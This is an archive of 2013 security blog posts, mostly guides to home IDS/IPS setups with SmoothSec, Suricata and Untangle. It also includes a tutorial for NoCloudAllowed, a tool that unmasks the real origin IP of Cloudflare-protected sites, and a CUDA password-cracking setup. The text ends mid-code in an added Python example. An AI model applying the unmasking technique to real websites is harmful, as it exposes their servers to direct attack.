Wednesday, December 18, 2013

HOWTO : Build a Fortress for Your Home/SOHO Network

**** Content is updated for SmoothSec 3.4-1 on January 30, 2014 ****

Hardware

(A) Unified Threat Management System (UTM)
Minix Mini HD PC (J&W) :
CPU - Intel ATOM D2550 (dual-core, 4 threads with Hyper-Threading)
Chipset - Intel NM10
GPU - Intel GMA 3600 Series
RAM - 2 x 2GB (DDR3-1066 SO-DIMM) 4GB
Hard Drive - 1 x 2.5-inch Hard Drive (80GB or above)
Networking - Dual Broadcom 57788 Gigabit Ethernet

(B) Intrusion Detection/Prevention System (IDS/IPS)
Minix Mini HD PC (J&W) :
CPU - Intel ATOM D2550 (dual-core, 4 threads with Hyper-Threading)
Chipset - Intel NM10
GPU - Intel GMA 3600 Series
RAM - 2 x 4GB (DDR3-1066 SO-DIMM) 8GB
Hard Drive - 1 x 2.5-inch Hard Drive (120GB or above)
Networking - Dual Broadcom 57788 Gigabit Ethernet
USB Networking - PCi USB 3.0 Gigabit LAN Adapter UE-1000T-G3 or Level One USB Gigabit Ethernet USB-0401

* A switch is also required for this setup if you have more than one computer.

I prefer the setup to be as follows :

Internet - SmoothSec (Suricata) - Router (Untangle UTM) - Switch (any switch) - Computers

Software

(A) Untangle 10.0 (64-bit) as UTM
Make sure you install the Lite Package, which is free of charge. If you want to purchase their services, such as Standard, you can install the Standard Package. For home/SOHO, the Lite Package is enough.

After the basic installation, you need to create an account at untangle.com in order to install the Lite Package (or the Standard Package).

(B) SmoothSec 3.4-1 (64-bit) as IDS/IPS with Suricata
Before setting up your SmoothSec, you need to upgrade the SmoothSec scripts to 3.6 and follow the instructions at the link just provided.

To set up IDS/IPS with Suricata, you can follow this section. Make sure you select “suricata” as AF_ENGINE in the configuration file. You should also follow this section for the setup.

For rules handling, you can refer to this link.

To fully understand the setup, you can read this article; even though it is written for 3.6 (not yet released at the moment), the concept is the same.

Conclusion

Thanks to the high performance of Suricata's AF_PACKET mode, the Broadcom 57788 Gigabit Ethernet and the Intel ATOM D2550 CPU, the network can play 1440p YouTube video without problem. Setting the QoS to Medium in Untangle 10.0 is recommended.

Meanwhile, the Minix Mini HD PC is around US$120 (barebone, without RAM and hard drive), so the hardware cost of building a fortress for your home/SOHO network is not too high. The running cost of this setup is very low as the software is free of charge. The footprint of the Minix Mini HD PC is very small, smaller than a standard ITX computer case.

If you do not know how to manage SmoothSec (Suricata), you can install Untangle only.

Friday, December 06, 2013

HOWTO : NoCloudAllowed on Kali Linux

Cloudflare is designed to protect websites from Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks. It acts as a proxy, so the real IP addresses of the websites are hidden. It also acts as a Web Application Firewall (WAF) for the websites behind its service.

However, there are a number of ways to bypass this protection. Since FTP services cannot be protected by Cloudflare, the ftp sub-domain of a website can be disclosed by the penetration testing tool Fierce Domain Scan (fierce.pl). There may be other services that cannot be protected by Cloudflare too.

Another way is to use NetCraft.com to find the IP address history of the website. Why does it work? Because some websites had been published for a while before using the Cloudflare service, and their IP addresses were archived by NetCraft.com. This works when the IP address of the website has not been changed since, or the SysAdmin overlooked it.

The above methods were mentioned in my previous article.

What if there is no FTP service and no IP address history at NetCraft.com? Should we panic? Be patient! Allison Nixon found a way to overcome this problem. She gave a presentation at BlackHat 2013 titled Denying Service to DDoS Protection Services.

She (with her team) developed a tool, NoCloudAllowed. How does it work? The tool compares the content served by each address in a range of IP addresses with the content of the origin website, in order to find the real IP address of the origin website. The tool is written in Perl.

Now, I will show you how to install it on Kali Linux.

Step 1 :

Install String::Compare.

perl -MCPAN -e 'shell'
install ExtUtils::MakeMaker
install String::Compare
exit


Step 2 :

Download nocloudallowed.pl.

wget http://nocloudallowed.com/nocloudallowed.pl



Type the following for “help” :

perl nocloudallowed.pl --help

Step 3 :

According to the BlackHat 2013 video, the website NoCloudAllowed.com is protected by Cloudflare and there is no previous IP address history at NetCraft.com.

Let us ping the website to see the IP address :

ping nocloudallowed.com
PING nocloudallowed.com (199.83.134.211) 56(84) bytes of data.
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=1 ttl=128 time=818 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=2 ttl=128 time=262 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=3 ttl=128 time=274 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=4 ttl=128 time=502 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=5 ttl=128 time=264 ms
^C
--- nocloudallowed.com ping statistics ---
6 packets transmitted, 5 received, 16% packet loss, time 6209ms
rtt min/avg/max/mdev = 262.464/424.601/818.947/217.222 ms

ping www.nocloudallowed.com
PING 2ruek.x.incapdns.net (103.28.248.171) 56(84) bytes of data.
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=1 ttl=128 time=1433 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=2 ttl=128 time=450 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=3 ttl=128 time=278 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=4 ttl=128 time=472 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=5 ttl=128 time=495 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=6 ttl=128 time=519 ms
^C
--- 2ruek.x.incapdns.net ping statistics ---
7 packets transmitted, 6 received, 14% packet loss, time 6009ms
rtt min/avg/max/mdev = 278.957/608.262/1433.255/377.086 ms, pipe 2


The result is that we got 2 different IP addresses - 199.83.134.211 and 103.28.248.171.

Step 4 :

There are two ways to use nocloudallowed.pl: "string matching" and "page percentage matching". Since the real IP address of nocloudallowed.com is 54.226.206.170, we limit the IP range to 54.226.206.0-54.226.206.255 for the demo.

In realistic cases, the IP range may be anywhere from 1.0.0.1 to 255.255.255.255. As expected, it will take a much longer time to get the result.

String matching :

perl nocloudallowed.pl -u http://www.nocloudallowed.com/ -i 54.226.206.0-54.226.206.255 -s @nixonnixoff

54.226.206.170 matched string


*** We select a unique string, @nixonnixoff, from the front page of www.nocloudallowed.com for matching.

Page percentage matching :

perl nocloudallowed.pl -u http://www.nocloudallowed.com/ -i 54.226.206.0-54.226.206.255

54.226.206.46 is a 4.28008963583708% match
54.226.206.8 is a 4.97538454727825% match
54.226.206.96 is a 6.4580555778227% match
54.226.206.170 is a 76.6947984574021% match
54.226.206.178 is a 2.6906293003467% match
54.226.206.153 is a 13.6152088933292% match
54.226.206.196 is a 5.90278413052861% match
54.226.206.219 is a 6.97554375390092% match
54.226.206.149 is a 1.88944750445606% match
54.226.206.254 is a 3.71636207826023% match
54.226.206.252 is a 5.23038802551876% match
54.226.206.248 is a 9.19859919167773% match


The conclusion is that Cloudflare cannot protect your website as expected.

That’s all! See you.

Thursday, December 05, 2013

BlackHat 2013 - Denying Service to DDoS Protection Services

Speaker :

Allison Nixon
Integralis

Allison Nixon does penetration testing and incident response at Integralis, either assisting companies in post-compromise situations, or compromising them. She gained an interest in security by cheating at video games, but quickly learned that the only way to make real gold is to work for a real company. She is intensely interested in all facets of security and continues to perform security research spanning any and all topics. Allison is a regular host on the Pauldotcom podcast, has spoken at B-Sides Boston 2013, local OWASP meetings, and sits on the executive board of MalShare. She also designed the electronics and software for the laser maze at the 2012 Braintank conference.

Briefing :

In this age of cheap and easy DDOS attacks, DDOS protection services promise to go between your server and the Internet to protect you from attackers. Cloud based DDOS protection suffers from several fundamental flaws that will be demonstrated in this talk. This was originally discovered in the process of investigating malicious websites protected by Cloudflare, but the issue also affects a number of other cloud based services including other cloud based anti-DDOS and WAF providers. We have developed a tool, called No Cloud Allowed, that will exploit this new cloud security bypass method and unmask a properly configured DDOS protected website. This talk will also discuss other unmasking methods and provide you with an arsenal to audit your cloud based DDOS or WAF protection.



Archives :

Presentation & Paper

PoC :

NoCloudAllowed.com

After Thought :

Once Cloudflare is bypassed and the origin IP address is obtained, an attacker can reach the origin directly as if it were any normal host, since the origin itself is not protected by Cloudflare's WAF.

Reference :

HOWTO - NoCloudAllowed on Kali Linux

That’s all! See you.

Sunday, November 10, 2013

HOWTO : Enhance Kali Linux 1.0.5

This article also suits Kali Linux 1.0.9a.

# hexchat (IRC Client)
Go to HexChat Download and download the latest version. Please note that the package below is for 64-bit.

For example, the latest version is hexchat_2.9.6.1-0_amd64.deb :

apt-get install libsexy2

wget http://dl.hexchat.net/hexchat/debian/hexchat_2.9.6.1-0_amd64.deb
dpkg -i hexchat_2.9.6.1-0_amd64.deb

# galculator
apt-get install galculator

# freemind (mindmap)
apt-get install freemind

# libreoffice
apt-get install libreoffice

# gedit
apt-get install gedit

# recordmydesktop
apt-get install gtk-recordmydesktop

# radiotray
apt-get install radiotray

# file-roller

apt-get install file-roller

# virtualbox
echo "deb http://download.virtualbox.org/virtualbox/debian wheezy contrib" > /etc/apt/sources.list.d/vbox.list

wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

apt-get update
apt-get install virtualbox-4.3


# flash
apt-get install flashplugin-nonfree

# alsa mixer to unmute Kali Linux
apt-get install alsa alsa-tools
amixer sset Master unmute


nano /etc/default/pulseaudio

Change from :

PULSEAUDIO_SYSTEM_START=0

Change to :

PULSEAUDIO_SYSTEM_START=1


# Bluetooth Audio Device

/etc/init.d/bluetooth start

apt-get install pulseaudio-module-bluetooth pulseaudio-module-gconf bluez-audio


Then reboot the box. After booting up, configure the Bluetooth device via the Bluetooth icon at the top right corner. Make sure you have started the Bluetooth service beforehand.

# Web Browser Media Plugin

apt-get install totem-mozilla

If you have already applied AppArmor, add the following lines to /etc/apparmor.d/usr.lib.iceweasel.iceweasel :

/usr/share/totem/fullscreen.ui r,
/usr/share/totem/mozilla-viewer.css r,
/usr/share/totem/mozilla-viewer.ui r,


Now you can play media, such as QuickTime, in the web browser.

That's all! See you.

HOWTO : CUDA on Kali Linux 1.0.5

Step 1 :

Download the CUDA driver from the nVidia official site.

# 64-bit
wget http://developer.download.nvidia.com/compute/cuda/5_5/rel/installers/cuda_5.5.22_linux_64.run

# 32-bit
wget http://developer.download.nvidia.com/compute/cuda/5_5/rel/installers/cuda_5.5.22_linux_32.run

Step 2 :

Install the CUDA driver. Accept the default values and also select to install the nVidia display driver.

# 64-bit
chmod +x cuda_5.5.22_linux_64.run
./cuda_5.5.22_linux_64.run


# 32-bit
chmod +x cuda_5.5.22_linux_32.run
./cuda_5.5.22_linux_32.run


Step 3 :

Create a .bash_profile.

nano /root/.bash_profile

# 64-bit
export PATH=/usr/local/cuda-5.5/bin:$PATH
export LD_LIBRARY_PATH=/usr/local/cuda-5.5/lib64:$LD_LIBRARY_PATH


# 32-bit
export PATH=/usr/local/cuda-5.5/bin:$PATH
export LD_LIBRARY_PATH=/usr/local/cuda-5.5/lib:$LD_LIBRARY_PATH


Step 4 :

Update the boot loader to disable the open source nouveau display driver for nVidia cards.

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Step 5 (Optional) :

To test CUDA with multiforcer :

# multiforcer for nvidia (example)
cd /usr/share/multiforcer/
multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt --noopencl


Step 6 (Optional) :

John the Ripper for CUDA.

# 64-bit
wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src
make
make clean linux-x86-64-gpu

cd ../run
./john --help


That's all! See you.

Tuesday, September 24, 2013

HOWTO : High Performance IDS/IPS with SmoothSec 3.4

The following Intrusion Detection/Prevention System (IDS/IPS) setup uses AF_PACKET with SmoothSec 3.4. It is intended for low-traffic home and SOHO users (or you can say that it is a Proof-of-Concept). If your traffic is heavy, please consider using higher-end hardware.

(A) Hardware

IDS/IPS -

Motherboard - Intel Desktop Board D510MO
CPU - Intel Atom D510 (Dual-core with HT)
RAM - 4GB (2 x 2GB)
Hard Drive - 320GB
Network Card 0 (eth0) - Onboard Gigabit
Network Card 1 (eth1) - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 (eth2) - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

* You can select (1) Level One USB-0401 USB Gigabit Ethernet Adapter or (2) PCi USB 3.0 Gigabit LAN Adapter UE-1000T-G3 for eth2. However, you need to compile and install the driver yourself.

Update : If you are using the latest Backports kernel, the Level One USB-0401 and PCi UE-1000T-G3 work out of the box.

Router -

Motherboard - Intel Desktop Board D510MO
CPU - Intel Atom D510 (Dual-core with HT)
RAM - 4GB (2 x 2GB)
Hard Drive - 320GB
Network Card 0 (eth0) - Onboard Gigabit
Network Card 1 (eth1) - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)

(B) Software

IDS/IPS -

Operating System - Debian 7.0 (Wheezy)
IDS/IPS Pre-configure system - SmoothSec 3.4 (64-bit)
IDS/IPS Engine - Snort (or Suricata)
Unified2 Spooler - Pigsty
Web Interface - Snorby
Rules Management - PulledPork

Router -

Operating System - Untangle 9.4.2 (64-bit)

* Basically, Untangle is a router and Unified Threat Management System (UTM).

(C) Hardware Setup

Internet ---- Router ---- SmoothSec ---- Switch ---- Personal Computers

Router -- eth0 connects to the Internet; eth1 connects to SmoothSec

SmoothSec -- eth0 connects to the Router; eth1 connects to the Switch (uplink or port 1); eth2 connects to the Switch (any port from 2 to 4)

* You can use any router to replace Untangle.

(D) Installation of SmoothSec

Download SmoothSec 3.4 here or here.

Make sure the SmoothSec box can reach the internet; otherwise, the installation will fail. Re-arrange the cables when necessary.

Updated : Since the scripts for 3.4 have been updated to 3.4.1, you should follow the link below to upgrade the scripts to 3.4.1.

Upgrade to scripts version 3.4.1

The 3.4.1 scripts install the newest Backports kernel instead of the Unstable kernel for Suricata IPS mode with AF_PACKET.

After installing SmoothSec, type the following :

smoothsec.first.setup

Snort -

Select "ips-standard" and follow the instructions to install. Please also refer here for the configuration of the config file. Make sure "AF_ENGINE" is set to "snort". The rules are "et" by default.

After the install, reboot your box.

Suricata -

Select "ips-standard" and follow the instructions to install. Please also refer here for the configuration of the config file. Make sure "AF_ENGINE" is set to "suricata". The rules are "et" by default.

A new Linux kernel 3.10.2 will be installed at the end.

After the install, reboot your box.

(E) Configuration of IDS/IPS

You may need to disable and/or drop some rules (by sid).

Snort -

You may need to configure the /etc/snort/snort.conf :

nano /etc/snort/snort.conf

For example, the subnet is 192.168.1.0/24.

Replace "ipvar HOME_NET any" with "ipvar HOME_NET [192.168.1.0/24]"

Replace "ipvar EXTERNAL_NET any" with "ipvar EXTERNAL_NET ![192.168.1.0/24]"

Restart Snort :

/etc/init.d/snort restart

Disable rules :

nano /etc/pulledpork/snort/disablesid.conf

Drop rules :

nano /etc/pulledpork/snort/dropsid.conf

After doing that, reload the rules :

smoothsec.snort.rules.update

Suricata -

Disable rules :

nano /etc/pulledpork/suricata/disablesid.conf

Drop rules :

nano /etc/pulledpork/suricata/dropsid.conf

After doing that, reload the rules :

smoothsec.suricata.rules.update

* If the rule is too long to disable or drop, you may consider editing "modifysid.conf". For example, to disable or drop the rule with sid 2013437 :

To disable the rule :

2013437 "alert" "##alert";

To drop the rule :

2013437 "alert" "drop";

(F) Configuration of Snorby

For example, the sensor IP address is 192.168.1.180.

Point your browser to https://192.168.1.180. Enter the username and password of Snorby.

Set up Snorby according to the SmoothSec WiKi.

* If you want to send your Snorby reports via Postfix, you need to install and configure it yourself.

sudo apt-get install postfix

Select "Internet Site" when asked.

(G) IDS/IPS Tuning

There may be some false positive records. You need to tune the settings by adding the sid to disablesid.conf or dropsid.conf when necessary. When using dropsid.conf, you may also need to set up the firewall at the Router to get the job done.

(H) Remarks

In the above setting, SmoothSec acts as IDS and IPS in one box.

If you want to install an IDS only, your SmoothSec requires only one Network Card, which is connected to the Switch.

In addition, SmoothSec 3.4 comes with Distributed IDS/IPS, which allows you to deploy multiple sensors with one control panel (Snorby).

Furthermore, you can also reset your box to the fresh install environment :

smoothsec.reset

When using Snorby, you may need to look up rules by sid. This link is for the rules lookup.

Make sure you create an empty file named restart.txt under /var/www/snorby/tmp :

touch /var/www/snorby/tmp/restart.txt

That's all! See you.

Monday, September 09, 2013

HOWTO : 15 Minutes to Deploy an IDS with SmoothSec 3.4

You can deploy your IDS (Intrusion Detection System) on your LAN within 15 minutes with SmoothSec 3.4. You can install SmoothSec 3.4 in a virtual machine, such as VMWare, VirtualBox or Parallels.

The virtual machine requires at least one CPU, 1GB RAM and 8GB+ HDD to run the IDS. The NIC is a bridged adapter.



That's all! See you.

Sunday, September 08, 2013

HOWTO : 30 minutes to deploy a distributed IDS with SmoothSec 3.4



Distributed IDS is one of the features of SmoothSec 3.4. It allows you to monitor more than one sensor with one web interface (Snorby). Furthermore, the distributed IDS can be deployed in virtual machines, such as VMWare, VirtualBox and Parallels.

The basic requirement for each virtual machine (console and sensor) is 1 CPU, 1GB RAM and 8GB+ virtual storage.

You can install up to 2 IDS engines, Snort and Suricata, in one box, or just one of them.

Hints for installation

When installing a sensor, you will be asked for an ssh passphrase; just press "Enter" and leave it empty. The path of the ssh key pair should be left at the default (nothing to change).

That's all! See you.

Sunday, September 01, 2013

HOWTO : Intrusion Detection System (IDS) made easy with SmoothSec 3.2

Building an IDS (Intrusion Detection System) at home/SOHO is not a dream today. SmoothSec 3.2 is designed for deploying an IDS without tears. You can use very low-end hardware for this purpose. To deploy an IDS, you need at least 2 NICs (Network Interfaces) if you have a managed switch with a SPAN port. If you do not have this expensive piece of equipment, you can build one with 3 NICs.

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - Debian 7 (Wheezy)
IDS/IPS pre-configured system - SmoothSec 3.2 (64-bit)
IDS/IPS Engine - Suricata

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Cards 0 and 1 will be bridged, while Network Card 2 will be the management interface.

Step 1 :

First of all, connect SmoothSec's Network Card 2 to the Switch, while Network Cards 0 and 1 stay disconnected from the router. This is because you need to connect to the internet for the installation.

Step 2 :

Install SmoothSec as usual or follow the wiki. During the installation, you may be prompted that some firmware is missing; just ignore it, as Debian is missing some firmware for the Realtek 8169. It is harmless to do so. After the install, the box will reboot.

Login as "root" with password "toor".

Step 2a :

To improve the SmoothSec :

apt-get --purge remove arpwatch
apt-get install arpalert openjdk-7-jre fail2ban
cd /etc/arpalert/
mv oui.txt oui.txt.old
wget http://standards.ieee.org/regauth/oui/oui.txt


Step 3 (Configuration of Suricata) :

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone to "UTC" under "None of the above"; otherwise, Snorby will report wrong timestamps.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix

Configure Postfix properly for your network in "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to the router and Network Card 1 to the Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment out all the existing eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asked for the monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

The email address and password are for the Snorby web interface login.

Then reboot.

Once booted up, go to one of the Personal Computers and browse to "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6:

To update SmoothSec, run the following commands (you can make a script to do so). The rules are updated automatically in the early morning every day.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master


Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform

Known Issue

Pigsty crashes randomly. As a result, nothing is captured in Snorby. The problem has been reported, see here. The workaround is to run a bash script every 5 minutes that checks the log and starts Pigsty again.

nano /root/chkpigstylog

#!/bin/bash
# Check whether "Error: " appears in pigsty.log. If it does and no Pigsty
# process is running, start Pigsty again. The process check prevents a
# second Pigsty from being spawned on every run once the error is logged.
# Make both scripts executable: chmod +x /root/chkpigstylog /root/runpigsty
STRING="Error: "
if grep -q "$STRING" /var/log/pigsty.log && ! pgrep -f /usr/local/bin/pigsty > /dev/null
then
   /root/runpigsty
fi


nano /root/runpigsty

#!/bin/bash
/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i eth0 -n "Suricata" -d /var/log/suricata/ -m unified2.alert.* -D


crontab -e
*/5 * * * * /root/chkpigstylog


Update

The developers have just fixed the problem. Just upgrade Pigsty with the following commands :

npm update pigsty-mysql -g
npm update pigsty -g


Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
SmoothSec WiKi - for installation

That's all! See you.

HOWTO : High Performance IDS/IPS with SmoothSec 3.2

Since the previous SmoothSec setup (HOWTO) is not perfect, I am going to use AF_PACKET as the packet acquisition engine. In this setting, you need at least 3 network interfaces, one of them for management.

As AF_PACKET has high performance, even very low-end hardware benefits. The following setup is ideal for a home/SOHO environment.

(A) Hardware

Motherboard - Intel Desktop Board D510MO
CPU - Intel Atom D510 (2-core with HT)
RAM - 4GB (2 x 2GB)
Hard Drive - 320GB
Network Card 0 (eth0) - Onboard Gigabit
Network Card 1 (eth1) - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 (eth2) - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

(B) Software

Operating System - Debian 7.0 (Wheezy)
IDS/IPS pre-configure system - SmoothSec 3.2 (64-bit)
IDS/IPS Engine - Suricata
Spooler - Pigsty
Web Interface - Snorby
Rules Management - PulledPork

(C) Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

SmoothSec will monitor all incoming and outgoing traffic between the router and the switch.

Step a - Cable connection :

First of all, connect SmoothSec's Network Card 2 to the Switch, while Network Cards 0 and 1 stay disconnected from the router for the moment. This is because you need to access the internet for the SmoothSec installation.

Step -1 - Installation of SmoothSec :

Install SmoothSec as usual or refer to the SmoothSec Wiki. When you are prompted to install non-free network interface firmware, just ignore it; Debian is missing some firmware for the Realtek 8169. After the installation, reboot the box as advised. The username is "root" and the password is "toor".

Step 0 - Install the missing packages :

apt-get install ethtool postfix fail2ban openjdk-7-jre

If you want to use Postfix as the mail server for the Snorby report, you should install it and configure it after the install. For the configuration of Postfix, you may ask Google if you do not know how.

Make sure you select "Internet Site" when installing Postfix.

You may consider installing fail2ban to protect your ssh service inside the network.

To improve the SmoothSec :

apt-get --purge remove arpwatch
apt-get install arpalert
cd /etc/arpalert/
mv oui.txt oui.txt.old
wget http://standards.ieee.org/regauth/oui/oui.txt


Step 1 - Get new Linux Kernel :

In order to install a high performance IDS/IPS, you need a newer kernel, version 3.7 or greater.

apt-cache search linux-image

Look for a Linux kernel version greater than 3.7. If there is none, add the following repos :

nano /etc/apt/sources.list

Append the following lines (the mirror address may differ from yours, but the suite must be "unstable") :
deb http://ftp.us.debian.org/debian/ unstable main
deb-src http://ftp.us.debian.org/debian/ unstable main


Then look again for a Linux kernel version greater than 3.7 :

apt-get update

I select the version 3.10 :

apt-get install linux-image-3.10-2-amd64 linux-headers-3.10-2-amd64

When you are asked to restart some services during the install, just reply "yes".

You will be warned about some missing firmware; just ignore it. Debian does not ship some firmware for the Realtek 8169. Anyway, it is harmless.

After the new kernel is installed, comment out what you added in "/etc/apt/sources.list". This step is VERY IMPORTANT, as the newer versions of Apache (2.4.x) and Perl from unstable will break Snorby and PulledPork, the web interface and rules management tool of SmoothSec.

Then reboot the SmoothSec and select the new kernel when it is available.

Step 2 - Configure Suricata :

nano /etc/suricata/suricata.yaml

Locate "#- delayed-detect: yes" and replace with "- delayed-detect: yes".

Locate "- fast:" and replace "enabled: no" with "enabled: yes".

Locate "- drop:" and replace "enabled: no" with "enabled: yes".

Locate "af-packet:" and replace "threads: 1" with "threads: 4", or with the number of CPU cores you have.

Locate "#checksum-checks: kernel" and replace it with "checksum-checks: kernel".

Locate "#copy-mode: ips" and replace it with "copy-mode: ips".

Locate "#copy-iface: eth1" and replace it with "copy-iface: eth1".

Add "buffer-size: 64535" just below "copy-iface: eth1".

Locate "- interface: eth1" and replace "threads: 1" with "threads: 4", or with the number of CPU cores you have.

Add the following lines just below "# disable-promisc: no" :

buffer-size: 64535
copy-mode: ips
copy-iface: eth0
use-mmap: yes
checksum-checks: kernel


Locate "rule-files:" and add "- local.rules" just below "- emerging.rules".

touch /etc/suricata/rules/local.rules

nano /etc/init.d/suricata

Locate "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -i $INTERFACES -D" and replace it with "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml --af-packet -D".

There are 2 entries; replace both of them.

Step 3 - Time Zone :

Make sure your SmoothSec is set to UTC, whatever your local time zone is. This is because Snorby only works with UTC; otherwise, the timestamps in Snorby will be wrong.

To check time zone of SmoothSec :

date

If the time is not UTC, change it back :

dpkg-reconfigure tzdata

Set the time zone to "UTC" under "None of the above".

Step 4 - Configure email feature of Snorby :

If you installed Postfix, configure it properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Then uncomment the lines just below "#Sendmail Example:". Or, refer to the SmoothSec Wiki for the installation.

Step 5 - Configure network interfaces :

Make it look like the following. Make sure eth2 has your own IP "address" and "gateway" instead of "192.168.2.180", which is an example only :

nano /etc/network/interfaces

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet manual
   up ifconfig eth0 0.0.0.0 up
   down ifconfig eth0 down
   post-up ethtool -K eth0 gro off

auto eth1
iface eth1 inet manual
   up ifconfig eth1 0.0.0.0 up
   down ifconfig eth1 down
   post-up ethtool -K eth1 gro off

# The primary network interface
#allow-hotplug eth2
#iface eth2 inet dhcp
auto eth2
iface eth2 inet static
   address 192.168.2.180
   netmask 255.255.255.0
   gateway 192.168.2.1


* Please note that ethtool is used because the Realtek network interfaces produce errors when working in AF_PACKET mode.

Error messages seen when debugging with "suricata -c /etc/suricata/suricata.yaml --af-packet" :

[ERRCODE: SC_ERR_SOCKET(200)] - Sending packet failed on socket 10: Message too long
[ERRCODE: SC_ERR_INVALID_ACTION(142)] - Unable to release packet data


Step 6 - Configure SmoothSec :

Run the following script to setup SmoothSec :

smoothsec.first.setup

Type "eth0" when asked for the monitor interface. Enter "192.168.2.0/24" when asked for the network. Please note that the address here is an example only. When asked for the Intrusion Detection Engine, type "2" for Suricata. The email address and password asked for are for the Snorby (web interface) login.

Step b - Cable connection :

Connect Network Card 0 to the router and Network Card 1 to the switch. Network Card 2 connect to the switch.

When done, reboot the SmoothSec.

Step 7 - Browse Snorby :

Wait several minutes before expecting internet access, as Suricata needs time to load the rules.

Open your browser and enter the following url :

https://192.168.2.180

Accept the self-signed certificate and wait about a minute; Snorby will then show up.

Step 8 - IPS Setup :

At this point SmoothSec runs as an IDS (Intrusion Detection System): it alerts on malicious traffic but does not block or drop it.

To run SmoothSec as an IPS (Intrusion Prevention System), you need to :

nano /etc/pulledpork/suricata/dropsid.conf

Append the following :

pcre:MS(0[0-9]|1[0-9])-\d+,bugtraq:\d+,cve:20[0-9][0-9]-\d+

This switches every rule whose references carry a vulnerability identifier (CVE, Bugtraq or a Microsoft MSxx-xxx bulletin) from alert to drop. That covers a large share of the ruleset, so expect some false positives to block legitimate traffic; review what gets dropped before leaving the box unattended. Meanwhile, you can add your own rules in "/etc/suricata/rules/local.rules". Make sure to run "smoothsec.suricata.rules.update" after you add them.

You may want to disable some rules :

nano /etc/pulledpork/suricata/disablesid.conf

Append the following :

1:2210000-1:2210049

This disables SIDs 2210000 through 2210049 (generator 1), 50 rules in total.

After done, run the following script :

smoothsec.suricata.rules.update

* Again, wait several minutes before expecting internet access, as Suricata needs time to reload the rules.
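To see what the dropsid pattern and a disablesid range actually do to a rules file before running "smoothsec.suricata.rules.update", here is an added example in Python that reimplements that post-processing on a few constructed rules. It is not PulledPork's or SmoothSec's code. It assumes PulledPork resolves its cve:/bugtraq:/MS tokens against the rule's "reference:" keyword, so the patterns here are written directly against that keyword; the sample rules, SIDs and references are made up. It covers both the range form (1:2210000-1:2210049) and the single-SID form (1:2100527) of disablesid.conf.

```python
"""Re-implementation of the disablesid / dropsid post-processing described
above, so the effect of a SID range or a dropsid pattern can be checked
against a rules file before it goes onto a live sensor.  Added example,
not PulledPork's own code."""
import re

# Constructed sample rules in Suricata syntax.  SIDs, references and msgs
# are illustrative and are not real Emerging Threats rules.
SAMPLE_RULES = """\
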